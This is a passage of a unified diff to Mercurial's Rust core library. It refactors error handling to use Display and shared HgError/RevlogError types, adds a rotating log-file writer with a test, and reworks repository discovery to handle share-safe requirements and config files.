HashMap<K, V, RandomXxHashBuilder64>; -#[derive(Clone, Debug, PartialEq)] -pub enum DirstateParseError { - TooLittleData, - Overflow, - // TODO refactor to use bytes instead of String - CorruptedEntry(String), - Damaged, -} - -impl From<std::io::Error> for DirstateParseError { - fn from(e: std::io::Error) -> Self { - DirstateParseError::CorruptedEntry(e.to_string()) - } -} - -impl ToString for DirstateParseError { - fn to_string(&self) -> String { - use crate::DirstateParseError::*; - match self { - TooLittleData => "Too little data for dirstate.".to_string(), - Overflow => "Overflow in dirstate.".to_string(), - CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e), - Damaged => "Dirstate appears to be damaged.".to_string(), - } - } -} - -#[derive(Debug, PartialEq)] -pub enum DirstatePackError { - CorruptedEntry(String), - CorruptedParent, - BadSize(usize, usize), -} - -impl From<std::io::Error> for DirstatePackError { - fn from(e: std::io::Error) -> Self { - DirstatePackError::CorruptedEntry(e.to_string()) - } -} #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -103,94 +62,61 @@ InvalidPath(HgPathError), } -impl ToString for DirstateMapError { - fn to_string(&self) -> String { +impl fmt::Display for DirstateMapError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { DirstateMapError::PathNotFound(_) => { - "expected a value, found none".to_string() + f.write_str("expected a value, found none") } - DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(), - DirstateMapError::InvalidPath(e) => e.to_string(), + DirstateMapError::EmptyPath => { + f.write_str("Overflow in dirstate.") + } + DirstateMapError::InvalidPath(path_error) => path_error.fmt(f), } } } -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum DirstateError { - Parse(DirstateParseError), - Pack(DirstatePackError), Map(DirstateMapError), - IO(std::io::Error), + Common(errors::HgError), } -impl From<DirstateParseError> for DirstateError { - fn from(e: DirstateParseError) -> Self { - DirstateError::Parse(e) - } -} - -impl From<DirstatePackError> for DirstateError { - fn from(e: DirstatePackError) -> Self { - DirstateError::Pack(e) - } -} - -#[derive(Debug)] +#[derive(Debug, derive_more::From)] pub enum PatternError { + #[from] Path(HgPathError), UnsupportedSyntax(String), UnsupportedSyntaxInFile(String, String, usize), TooLong(usize), + #[from] IO(std::io::Error), /// Needed a pattern that can be turned into a regex but got one that /// can't. This should only happen through programmer error. NonRegexPattern(IgnorePattern), } -impl ToString for PatternError { - fn to_string(&self) -> String { +impl fmt::Display for PatternError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { PatternError::UnsupportedSyntax(syntax) => { - format!("Unsupported syntax {}", syntax) + write!(f, "Unsupported syntax {}", syntax) } PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => { - format!( + write!( + f, "{}:{}: unsupported syntax {}", file_path, line, syntax ) } PatternError::TooLong(size) => { - format!("matcher pattern is too long ({} bytes)", size) + write!(f, "matcher pattern is too long ({} bytes)", size) } - PatternError::IO(e) => e.to_string(), - PatternError::Path(e) => e.to_string(), + PatternError::IO(error) => error.fmt(f), + PatternError::Path(error) => error.fmt(f), PatternError::NonRegexPattern(pattern) => { - format!("'{:?}' cannot be turned into a regex", pattern) + write!(f, "'{:?}' cannot be turned into a regex", pattern) } } } } - -impl From<DirstateMapError> for DirstateError { - fn from(e: DirstateMapError) -> Self { - DirstateError::Map(e) - } -} - -impl From<std::io::Error> for DirstateError { - fn from(e: std::io::Error) -> Self { - DirstateError::IO(e) - } -} - -impl From<std::io::Error> for PatternError { - fn from(e: std::io::Error) -> Self { - PatternError::IO(e) - } -} - -impl From<HgPathError> for PatternError { - fn from(e: HgPathError) -> Self { - PatternError::Path(e) - } -} diff --git a/rust/hg-core/src/logging.rs b/rust/hg-core/src/logging.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/logging.rs @@ -0,0 +1,101 @@ +use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt}; +use crate::repo::Vfs; +use std::io::Write; + +/// An utility to append to a log file with the given name, and optionally +/// rotate it after it reaches a certain maximum size. +/// +/// Rotation works by renaming "example.log" to "example.log.1", after renaming +/// "example.log.1" to "example.log.2" etc up to the given maximum number of +/// files. +pub struct LogFile<'a> { + vfs: Vfs<'a>, + name: &'a str, + max_size: Option<u64>, + max_files: u32, +} + +impl<'a> LogFile<'a> { + pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self { + Self { + vfs, + name, + max_size: None, + max_files: 0, + } + } + + /// Rotate before writing to a log file that was already larger than the + /// given size, in bytes. `None` disables rotation. + pub fn max_size(mut self, value: Option<u64>) -> Self { + self.max_size = value; + self + } + + /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in + /// addition to the original `{name}` file. + pub fn max_files(mut self, value: u32) -> Self { + self.max_files = value; + self + } + + /// Append the given `bytes` as-is to the log file, after rotating if + /// needed. + /// + /// No trailing newline is added. Make sure to include one in `bytes` if + /// desired. + pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> { + let path = self.vfs.join(self.name); + let context = || IoErrorContext::WritingFile(path.clone()); + let open = || { + std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&path) + .with_context(context) + }; + let mut file = open()?; + if let Some(max_size) = self.max_size { + if file.metadata().with_context(context)?.len() >= max_size { + // For example with `max_files == 5`, the first iteration of + // this loop has `i == 4` and renames `{name}.4` to `{name}.5`. + // The last iteration renames `{name}.1` to + // `{name}.2` + for i in (1..self.max_files).rev() { + self.vfs + .rename( + format!("{}.{}", self.name, i), + format!("{}.{}", self.name, i + 1), + ) + .io_not_found_as_none()?; + } + // Then rename `{name}` to `{name}.1`. This is the + // previously-opened `file`. + self.vfs + .rename(self.name, format!("{}.1", self.name)) + .io_not_found_as_none()?; + // Finally, create a new `{name}` file and replace our `file` + // handle. + file = open()?; + } + } + file.write_all(bytes).with_context(context)?; + file.sync_all().with_context(context) + } +} + +#[test] +fn test_rotation() { + let temp = tempfile::tempdir().unwrap(); + let vfs = Vfs { base: temp.path() }; + let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2); + logger.write(b"one\n").unwrap(); + logger.write(b"two\n").unwrap(); + logger.write(b"3\n").unwrap(); + logger.write(b"four\n").unwrap(); + logger.write(b"five\n").unwrap(); + assert_eq!(vfs.read("log").unwrap(), b"five\n"); + assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n"); + assert_eq!(vfs.read("log.2").unwrap(), b"two\n"); + assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none()); +} diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -5,7 +5,6 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use std::convert::From; use std::path::PathBuf; use crate::repo::Repo; @@ -15,99 +14,59 @@ use crate::revlog::revlog::Revlog; use crate::revlog::revlog::RevlogError; use crate::revlog::Node; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; +pub struct CatOutput { + /// Whether any file in the manifest matched the paths given as CLI + /// arguments + pub found_any: bool, + /// The contents of matching files, in manifest order + pub concatenated: Vec<u8>, + /// Which of the CLI arguments did not match any manifest file + pub missing: Vec<HgPathBuf>, + /// The node ID that the given revset was resolved to + pub node: Node, +} + const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// Kind of error encountered by `CatRev` -#[derive(Debug)] -pub enum CatRevErrorKind { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -/// A `CatRev` error -#[derive(Debug)] -pub struct CatRevError { - /// Kind of error encountered by `CatRev` - pub kind: CatRevErrorKind, -} - -impl From<CatRevErrorKind> for CatRevError { - fn from(kind: CatRevErrorKind) -> Self { - CatRevError { kind } - } -} - -impl From<RevlogError> for CatRevError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => CatRevErrorKind::IoError(err), - RevlogError::UnsuportedVersion(version) => { - CatRevErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision, - RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix, - RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - CatRevErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - -/// List files under Mercurial control at a given revision. +/// Output the given revision of files /// /// * `root`: Repository root /// * `rev`: The revision to cat the files from. /// * `files`: The files to output. -pub fn cat( +pub fn cat<'a>( repo: &Repo, - rev: &str, - files: &[HgPathBuf], -) -> Result<Vec<u8>, CatRevError> { + revset: &str, + files: &'a [HgPathBuf], +) -> Result<CatOutput, RevlogError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .map_err(|_| CatRevErrorKind::InvalidRevision)?; - changelog.get_node(changelog_node.borrow())? - } - }; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let changelog_entry = changelog.get_rev(rev)?; + let node = *changelog + .node_from_rev(rev) + .expect("should succeed when changelog.get_rev did"); + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; + let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; + let mut matched = vec![false; files.len()]; + let mut found_any = false; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { - for cat_file in files.iter() { + for (cat_file, is_matched) in files.iter().zip(&mut matched) { if cat_file.as_bytes() == manifest_file.as_bytes() { + *is_matched = true; + found_any = true; let index_path = store_path(manifest_file, b".i"); let data_path = store_path(manifest_file, b".d"); let file_log = Revlog::open(repo, &index_path, Some(&data_path))?; - let file_node = Node::from_hex(node_bytes) - .map_err(|_| CatRevErrorKind::CorruptedRevlog)?; - let file_rev = file_log.get_node_rev((&file_node).into())?; + let file_node = Node::from_hex_for_repo(node_bytes)?; + let file_rev = file_log.get_node_rev(file_node.into())?; let data = file_log.get_rev_data(file_rev)?; if data.starts_with(&METADATA_DELIMITER) { let end_delimiter_position = data @@ -125,7 +84,18 @@ } } - Ok(bytes) + let missing: Vec<_> = files + .iter() + .zip(&matched) + .filter(|pair| !*pair.1) + .map(|pair| pair.0.clone()) + .collect(); + Ok(CatOutput { + found_any, + concatenated: bytes, + missing, + node, + }) } fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf { diff --git a/rust/hg-core/src/operations/debugdata.rs b/rust/hg-core/src/operations/debugdata.rs --- a/rust/hg-core/src/operations/debugdata.rs +++ b/rust/hg-core/src/operations/debugdata.rs @@ -7,8 +7,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; -use crate::revlog::Revision; /// Kind of data to debug #[derive(Debug, Copy, Clone)] @@ -17,86 +15,19 @@ Manifest, } -/// Kind of error encountered by DebugData -#[derive(Debug)] -pub enum DebugDataErrorKind { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -/// A DebugData error -#[derive(Debug)] -pub struct DebugDataError { - /// Kind of error encountered by DebugData - pub kind: DebugDataErrorKind, -} - -impl From<DebugDataErrorKind> for DebugDataError { - fn from(kind: DebugDataErrorKind) -> Self { - DebugDataError { kind } - } -} - -impl From<std::io::Error> for DebugDataError { - fn from(err: std::io::Error) -> Self { - let kind = DebugDataErrorKind::IoError(err); - DebugDataError { kind } - } -} - -impl From<RevlogError> for DebugDataError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => DebugDataErrorKind::IoError(err), - RevlogError::UnsuportedVersion(version) => { - DebugDataErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - DebugDataErrorKind::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - DebugDataErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog, - RevlogError::UnknowDataFormat(format) => { - DebugDataErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - /// Dump the contents data of a revision. pub fn debug_data( repo: &Repo, - rev: &str, + revset: &str, kind: DebugDataKind, -) -> Result<Vec<u8>, DebugDataError> { +) -> Result<Vec<u8>, RevlogError> { let index_file = match kind { DebugDataKind::Changelog => "00changelog.i", DebugDataKind::Manifest => "00manifest.i", }; let revlog = Revlog::open(repo, index_file, None)?; - - let data = match rev.parse::<Revision>() { - Ok(rev) => revlog.get_rev_data(rev)?, - _ => { - let node = NodePrefix::from_hex(&rev) - .map_err(|_| DebugDataErrorKind::InvalidRevision)?; - let rev = revlog.get_node_rev(node.borrow())?; - revlog.get_rev_data(rev)? - } - }; - + let rev = + crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?; + let data = revlog.get_rev_data(rev)?; Ok(data) } diff --git a/rust/hg-core/src/operations/dirstate_status.rs b/rust/hg-core/src/operations/dirstate_status.rs --- a/rust/hg-core/src/operations/dirstate_status.rs +++ b/rust/hg-core/src/operations/dirstate_status.rs @@ -14,66 +14,6 @@ /// files. pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>); -#[cfg(feature = "dirstate-tree")] -impl<'a, M: Matcher + Sync> Status<'a, M> { - pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { - let (traversed_sender, traversed_receiver) = - crossbeam_channel::unbounded(); - - // Step 1: check the files explicitly mentioned by the user - let (work, mut results) = self.walk_explicit(traversed_sender.clone()); - - // Step 2: Check files in the dirstate - if !self.matcher.is_exact() { - self.extend_from_dmap(&mut results); - } - // Step 3: Check the working directory if listing unknowns - if !work.is_empty() { - // Hashmaps are quite a bit slower to build than vecs, so only - // build it if needed. - let mut old_results = None; - - // Step 2: recursively check the working directory for changes if - // needed - for (dir, dispatch) in work { - match dispatch { - Dispatch::Directory { was_file } => { - if was_file { - results.push((dir.to_owned(), Dispatch::Removed)); - } - if self.options.list_ignored - || self.options.list_unknown - && !self.dir_ignore(&dir) - { - if old_results.is_none() { - old_results = - Some(results.iter().cloned().collect()); - } - self.traverse( - &dir, - old_results - .as_ref() - .expect("old results should exist"), - &mut results, - traversed_sender.clone(), - ); - } - } - _ => { - unreachable!("There can only be directories in `work`") - } - } - } - } - - drop(traversed_sender); - let traversed = traversed_receiver.into_iter().collect(); - - Ok(build_response(results, traversed)) - } -} - -#[cfg(not(feature = "dirstate-tree"))] impl<'a, M: Matcher + Sync> Status<'a, M> { pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { let (traversed_sender, traversed_receiver) = diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs deleted file mode 100644 --- a/rust/hg-core/src/operations/find_root.rs +++ /dev/null @@ -1,100 +0,0 @@ -use std::fmt; -use std::path::{Path, PathBuf}; - -/// Kind of error encoutered by FindRoot -#[derive(Debug)] -pub enum FindRootErrorKind { - /// Root of the repository has not been found - /// Contains the current directory used by FindRoot - RootNotFound(PathBuf), - /// The current directory does not exists or permissions are insufficient - /// to get access to it - GetCurrentDirError(std::io::Error), -} - -/// A FindRoot error -#[derive(Debug)] -pub struct FindRootError { - /// Kind of error encoutered by FindRoot - pub kind: FindRootErrorKind, -} - -impl std::error::Error for FindRootError {} - -impl fmt::Display for FindRootError { - fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result { - unimplemented!() - } -} - -/// Find the root of the repository -/// by searching for a .hg directory in the process’ current directory and its -/// ancestors -pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir().map_err(|e| FindRootError { - kind: FindRootErrorKind::GetCurrentDirError(e), - })?; - Ok(find_root_from_path(¤t_dir)?.into()) -} - -/// Find the root of the repository -/// by searching for a .hg directory in the given directory and its ancestors -pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> { - if start.join(".hg").exists() { - return Ok(start); - } - for ancestor in start.ancestors() { - if ancestor.join(".hg").exists() { - return Ok(ancestor); - } - } - Err(FindRootError { - kind: FindRootErrorKind::RootNotFound(start.into()), - }) -} - -#[cfg(test)] -mod tests { - use super::*; - use std::fs; - use tempfile; - - #[test] - fn dot_hg_not_found() { - let tmp_dir = tempfile::tempdir().unwrap(); - let path = tmp_dir.path(); - - let err = find_root_from_path(&path).unwrap_err(); - - // TODO do something better - assert!(match err { - FindRootError { kind } => match kind { - FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }, - }) - } - - #[test] - fn dot_hg_in_current_path() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let result = find_root_from_path(&root).unwrap(); - - assert_eq!(result, root) - } - - #[test] - fn dot_hg_in_parent() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let directory = root.join("some/nested/directory"); - let result = find_root_from_path(&directory).unwrap(); - - assert_eq!(result, root) - } -} /* tests */ diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,47 +6,15 @@ // GNU General Public License version 2 or any later version. use crate::dirstate::parsers::parse_dirstate; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; -use crate::revlog::node::{Node, NodePrefix}; +use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; -use crate::revlog::Revision; use crate::utils::hg_path::HgPath; -use crate::{DirstateParseError, EntryState}; +use crate::EntryState; use rayon::prelude::*; -use std::convert::From; - -/// Kind of error encountered by `ListDirstateTrackedFiles` -#[derive(Debug)] -pub enum ListDirstateTrackedFilesErrorKind { - /// Error when reading the `dirstate` file - IoError(std::io::Error), - /// Error when parsing the `dirstate` file - ParseError(DirstateParseError), -} - -/// A `ListDirstateTrackedFiles` error -#[derive(Debug)] -pub struct ListDirstateTrackedFilesError { - /// Kind of error encountered by `ListDirstateTrackedFiles` - pub kind: ListDirstateTrackedFilesErrorKind, -} - -impl From<ListDirstateTrackedFilesErrorKind> - for ListDirstateTrackedFilesError -{ - fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self { - ListDirstateTrackedFilesError { kind } - } -} - -impl From<std::io::Error> for ListDirstateTrackedFilesError { - fn from(err: std::io::Error) -> Self { - let kind = ListDirstateTrackedFilesErrorKind::IoError(err); - ListDirstateTrackedFilesError { kind } - } -} /// List files under Mercurial control in the working directory /// by reading the dirstate @@ -56,16 +24,13 @@ } impl Dirstate { - pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> { + pub fn new(repo: &Repo) -> Result<Self, HgError> { let content = repo.hg_vfs().read("dirstate")?; Ok(Self { content }) } - pub fn tracked_files( - &self, - ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { - let (_, entries, _) = parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?; + pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> { + let (_, entries, _) = parse_dirstate(&self.content)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { @@ -78,81 +43,18 @@ } } -/// Kind of error encountered by `ListRevTrackedFiles` -#[derive(Debug)] -pub enum ListRevTrackedFilesErrorKind { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -/// A `ListRevTrackedFiles` error -#[derive(Debug)] -pub struct ListRevTrackedFilesError { - /// Kind of error encountered by `ListRevTrackedFiles` - pub kind: ListRevTrackedFilesErrorKind, -} - -impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError { - fn from(kind: ListRevTrackedFilesErrorKind) -> Self { - ListRevTrackedFilesError { kind } - } -} - -impl From<RevlogError> for ListRevTrackedFilesError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => { - ListRevTrackedFilesErrorKind::IoError(err) - } - RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - ListRevTrackedFilesErrorKind::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - ListRevTrackedFilesErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => { - ListRevTrackedFilesErrorKind::CorruptedRevlog - } - RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - /// List files under Mercurial control at a given revision. pub fn list_rev_tracked_files( repo: &Repo, - rev: &str, -) -> Result<FilesForRev, ListRevTrackedFilesError> { + revset: &str, +) -> Result<FilesForRev, RevlogError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node.borrow())? - } - }; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let changelog_entry = changelog.get_rev(rev)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; + let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -5,19 +5,8 @@ mod cat; mod debugdata; mod dirstate_status; -mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError, CatRevErrorKind}; -pub use debugdata::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -pub use find_root::{ - find_root, find_root_from_path, FindRootError, FindRootErrorKind, -}; -pub use list_tracked_files::{ - list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -pub use list_tracked_files::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +pub use cat::{cat, CatOutput}; +pub use debugdata::{debug_data, DebugDataKind}; +pub use list_tracked_files::Dirstate; +pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,10 @@ -use crate::operations::{find_root, FindRootError}; +use crate::config::{Config, ConfigError, ConfigParseError}; +use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; +use crate::utils::files::get_path_from_bytes; +use crate::utils::SliceExt; use memmap::{Mmap, MmapOptions}; +use std::collections::HashSet; use std::path::{Path, PathBuf}; /// A repository on disk @@ -8,85 +12,255 @@ working_directory: PathBuf, dot_hg: PathBuf, store: PathBuf, + requirements: HashSet<String>, + config: Config, +} + +#[derive(Debug, derive_more::From)] +pub enum RepoError { + NotFound { + at: PathBuf, + }, + #[from] + ConfigParseError(ConfigParseError), + #[from] + Other(HgError), +} + +impl From<ConfigError> for RepoError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), + } + } } /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] -pub(crate) struct Vfs<'a> { - base: &'a Path, +pub struct Vfs<'a> { + pub(crate) base: &'a Path, } impl Repo { - /// Returns `None` if the given path doesn’t look like a repository - /// (doesn’t contain a `.hg` sub-directory). - pub fn for_path(root: impl Into<PathBuf>) -> Self { - let working_directory = root.into(); - let dot_hg = working_directory.join(".hg"); - Self { - store: dot_hg.join("store"), - dot_hg, - working_directory, + /// Find a repository, either at the given path (which must contain a `.hg` + /// sub-directory) or by searching the current directory and its + /// ancestors. + /// + /// A method with two very different "modes" like this usually a code smell + /// to make two methods instead, but in this case an `Option` is what rhg + /// sub-commands get from Clap for the `-R` / `--repository` CLI argument. + /// Having two methods would just move that `if` to almost all callers. + pub fn find( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Self, RepoError> { + if let Some(root) = explicit_path { + if root.join(".hg").is_dir() { + Self::new_at_path(root.to_owned(), config) + } else if root.is_file() { + Err(HgError::unsupported("bundle repository").into()) + } else { + Err(RepoError::NotFound { + at: root.to_owned(), + }) + } + } else { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` + // as-is. + for ancestor in current_directory.ancestors() { + if ancestor.join(".hg").is_dir() { + return Self::new_at_path(ancestor.to_owned(), config); + } + } + Err(RepoError::NotFound { + at: current_directory, + }) } } - pub fn find() -> Result<Self, FindRootError> { - find_root().map(Self::for_path) - } + /// To be called after checking that `.hg` is a sub-directory + fn new_at_path( + working_directory: PathBuf, + config: &Config, + ) -> Result<Self, RepoError> { + let dot_hg = working_directory.join(".hg"); + + let mut repo_config_files = Vec::new(); + repo_config_files.push(dot_hg.join("hgrc")); + repo_config_files.push(dot_hg.join("hgrc-not-shared")); + + let hg_vfs = Vfs { base: &dot_hg }; + let mut reqs = requirements::load_if_exists(hg_vfs)?; + let relative = + reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); + let shared = + reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + + // From `mercurial/localrepo.py`: + // + // if .hg/requires contains the sharesafe requirement, it means + // there exists a `.hg/store/requires` too and we should read it + // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement + // is present. We never write SHARESAFE_REQUIREMENT for a repo if store + // is not present, refer checkrequirementscompat() for that + // + // However, if SHARESAFE_REQUIREMENT is not present, it means that the + // repository was shared the old way. We check the share source + // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the + // current repository needs to be reshared + let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT); + + let store_path; + if !shared { + store_path = dot_hg.join("store"); + } else { + let bytes = hg_vfs.read("sharedpath")?; + let mut shared_path = + get_path_from_bytes(bytes.trim_end_newlines()).to_owned(); + if relative { + shared_path = dot_hg.join(shared_path) + } + if !shared_path.is_dir() { + return Err(HgError::corrupted(format!( + ".hg/sharedpath points to nonexistent directory {}", + shared_path.display() + )) + .into()); + } + + store_path = shared_path.join("store"); - pub fn check_requirements( - &self, - ) -> Result<(), requirements::RequirementsError> { - requirements::check(self) + let source_is_share_safe = + requirements::load(Vfs { base: &shared_path })? + .contains(requirements::SHARESAFE_REQUIREMENT); + + if share_safe && !source_is_share_safe { + return Err(match config + .get(b"share", b"safe-mismatch.source-not-safe") + { + Some(b"abort") | None => HgError::abort( + "abort: share source does not support share-safe requirement\n\ + (see `hg help config.format.use-share-safe` for more information)", + ), + _ => HgError::unsupported("share-safe downgrade"), + } + .into()); + } else if source_is_share_safe && !share_safe { + return Err( + match config.get(b"share", b"safe-mismatch.source-safe") { + Some(b"abort") | None => HgError::abort( + "abort: version mismatch: source uses share-safe \ + functionality while the current share does not\n\ + (see `hg help config.format.use-share-safe` for more information)", + ), + _ => HgError::unsupported("share-safe upgrade"), + } + .into(), + ); + } + + if share_safe { + repo_config_files.insert(0, shared_path.join("hgrc")) + } + } + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } + + let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() { + config.combine_with_repo(&repo_config_files)? + } else { + config.clone() + }; + + let repo = Self { + requirements: reqs, + working_directory, + store: store_path, + dot_hg, + config: repo_config, + }; + + requirements::check(&repo)?; + + Ok(repo) } pub fn working_directory_path(&self) -> &Path { &self.working_directory } + pub fn requirements(&self) -> &HashSet<String> { + &self.requirements + } + + pub fn config(&self) -> &Config { + &self.config + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). - pub(crate) fn hg_vfs(&self) -> Vfs<'_> { + pub fn hg_vfs(&self) -> Vfs<'_> { Vfs { base: &self.dot_hg } } /// For accessing repository store files (in `.hg/store`) - pub(crate) fn store_vfs(&self) -> Vfs<'_> { + pub fn store_vfs(&self) -> Vfs<'_> { Vfs { base: &self.store } } /// For accessing the working copy - - // The undescore prefix silences the "never used" warning. Remove before - // using. - pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } } + + pub fn 